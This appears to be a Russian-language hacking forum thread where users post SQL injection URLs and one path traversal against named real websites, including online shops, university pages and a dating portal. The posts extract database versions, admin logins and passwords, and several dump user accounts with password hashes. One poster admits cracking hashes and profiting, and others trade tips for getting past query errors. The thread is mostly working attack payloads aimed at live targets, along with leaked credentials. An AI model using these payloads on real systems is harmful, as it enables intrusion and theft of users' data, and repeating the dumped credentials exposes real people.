uni.de инжектится во все дыры, плюс читалка http://www.uni.de/?goto=../../../../../../../../etc/passwd%00
http://www.matrixtelecom.ru. Компания Матрикс Телеком. Практически любой параметр в передаваемых скриптам уязвим к SQL-Injection. Сложность состоит в том, что отключён вывод ошибок в страницу и фильтруется кавычка. Ну это скорее не сложность, а маленькая неприятность. Админка находится на урле http://www.matrixtelecom.ru/admin, которая требует авторизации доступа. Это не беда - тут есть SQL Injection. Приступим: -- Определяем версию http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,DATABASE()/* -- Перебираем колонки (интересующая нас с индексом 16 и именем mx_conf) http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1/* -- Перебираем поля в этой таблице http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6d785f636f6e66+LIMIT+X,1/* -- Получаем структуру таблицы настроек сайта: mx_con(cnf_name, сnf_def, cnf_value) -- Перебираем настройки сайта из таблицы mx_con http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_value+FROM+mx_conf+LIMIT+X,1/* -- Нас интересует логин http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_value+FROM+mx_conf+LIMIT+0,1/* -- И пароль http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_value+FROM+mx_conf+LIMIT+1,1/* Всё... Доступ в админку открыт... З.Ы. Администрация сайта уведомлена о данном баге. Не стоит дефейсить или менять контент.
Code: http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/* Code: http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 +from+information_schema.columns/*/ Code: http://5ballov.ru/vacansy.php?city=Москва&salary_min=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20/*&schedule=свободный&sort=salary_min Code: http://www.gameland.ru/articles2/catalog/game.asp?code=1' Great: либо ковыряй до конца, либо не пости. даю три дня, потом удаляю
Google: PR - 7 http://primes.utm.edu University of Tennessee at Martin Martin, TN 38238 Code: http://primes.utm.edu/bios/page.php?id=&username=lol'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* 4.1.20-logrimes_@localhostrimes
Google: PR - 5 theboard.byu.edu http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 5.0.24-Debian_1-log:100hourboard@localhost:100hourboard http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+TABLE_NAME,TABLE_SCHEMA,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+limit+150,1/* смотрим таблици [100hourboard] 100Hrbb_banlist 100Hrbb_categories 100Hrbb_config 100Hrbb_confirm 100Hrbb_disallow 100Hrbb_easymod 100Hrbb_forum_prune 100Hrbb_forums 100Hrbb_groups 100Hrbb_posts 100Hrbb_posts_text 100Hrbb_privmsgs 100Hrbb_privmsgs_text 100Hrbb_ranks 100Hrbb_search_results 100Hrbb_search_wordlist 100Hrbb_search_wordmatch 100Hrbb_sessions 100Hrbb_smilies 100Hrbb_themes 100Hrbb_themes_name 100Hrbb_topics 100Hrbb_topics_watch 100Hrbb_user_group 100Hrbb_vote_desc и тд вот нужные таблици но у меня нет начал лагать кто хочет подберите столбци и получите пассы и мыла 100Hrbb_users phprojekt_users
evruka.ru - Интернет-магазин 4.1.21-log:evrubase:[email protected] Подобрал название столбцов: Code: http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(username,char(58),passwd)+from+user+limit+141,141+--+ Получил: 89637:40f939d31d2e2a25 Но при запросе: Code: http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(passwd)+from+user+limit+141,141+--+ Получил совершенно другой хэш: 3e70346730b14ce7 У меня 2 вопроса почему так получается и каким алгоритмом шифруется пароль
Интернет магазин 1 d o l l a r . r u, даже выплаты на автомате mysql: 4.1.22-standard-log Вытащил пароли всех юзеров, пароли в md5, половину только расшифровал, и немного поживился
хм berkeley.edu скрипт: journalism.berkeley.edu/students/resume.php параметр: ID кол-во колонок: 23 версия: 4.1.22 юзер: jschool@localhost база: facebook
Code: http://www.multi-service.ru/main.php?inc=tb_viev&pref=1&sw=1&id_vlosh=16+order+by+9/* дальше не пошло. может мускул 3 версии , где то в топике была ссылка на статью по инъекции в 3 версию... лень искать... а может хитрый какой нить запрос ... не знаю... крутите дальше кто хочет )
game-ost.ru 4.1.14-log:gameost1_ananii@localhost:gameost1_gameost Code: http://www.game-ost.ru/news_comments.php?id=399+UNION+SELECT+1,concat(cast(version()+as+binary),char(58),cast(user()+as+binary),char(58),cast(database()+as+binary)),3,4,5,6,7,8,9,10+from+news+--+ Смог подобрать 2 таблицы: news,articles
http://www.globaltrading.ru/price.php3?Cat_id=1393+union+select+1,2,3,4,5,6,version(),database(),user(),10,11,12,13,14,version(),16,17,18,19,20,21,22/* globalt9_globaltr 4.0.18-log globalt9_globalt@localhost _________________ edited: http://www.goldsteel.ru/catalog.php?tovar_id=123+union+select+1,2,3,4,5,6,7,concat(user(),char(58),version(),char(58),database()),9/* нет прямого вывода данных -( _________________ edited2: http://mag-russia.ru/news.php?id=38'+union+select+1,user(),concat(database(),char(58),version()),4/* [email protected] 1gb_mag_russia:5.0.24a-community-max-nt-log //там же и админка.
edu. Код: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,2,3,4,5,6/* help! не могу понять что тут я неправильно делаю код: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,user(),3,4,5,6/*
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' Выдает эту ошибку на запрос к любой колонке, существующей в базе. выходит стоит какая-то защита, имо.
Вот так пробуй: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),1),1),3,4,5,6/* Или даже так: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,CAST(user()+AS+BINARY),3,4,5,6/* Это не защита на хосте, это проблема перекодировки из UTF-8.
http://www.watchiki.ru/p/19+union+select+1,2,concat(version(),char(58),database(),char(58),user()),4,5,6,7/* 4.1.22 k1_tiktak k1_tiktak@localhost но почему то у меня постоянная проблема с подбором паролей и е-маилов -( кто может подсказать, или доработать этот скуль?
Уязвимость на крупном украинском портале знакомств: http://www.ukraineloves.com/search/extend-info.php?girl_id=-1+UNION+SELECT+VERSION(),2,3,4,5,USER(),DATABASE(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54--+&photo=1
Code: http://infoshop.zaraz.org/?r=3&list_exp=-1+union+select+null,null,null,null,concat_ws(char(58),username,password,email),null,null,null,null,null,null,null,null,null+from+phorum_users/* Code: admin:3fd07483d0d44301fc0e987a6a517693:[email protected] # z2r2z magduv:1eaf7c068a250a38e3bab770053c14c3:[email protected] test:098f6bcd4621d373cade4e832627b4f6:[email protected] жТБХОЗПЖЕТ:bd40cd94a7ccf4b802b1090af055afaa:[email protected] Tvorog:11967d5e9addc5416ea9224eee0e91fc:[email protected] # huy matvey:7c7d80ae76edbe1c202a4e2baa3c271b:[email protected] аккаунты admin и test не активированы http://phorum.zaraz.org/admin.php Phorum Admin version 5.0.5-beta сам форум и админка
Инъекция в Oracle: Oracle8i Enterprise Edition Release 8.1.7.4.0 - Production PL/SQL Release 8.1.7.4.0 - Production CORE 8.1.7.0.0 Production TNS for Linux: Version 8.1.7.4.0 - Production NLSRTL Version 3.4.1.0.0 - Production
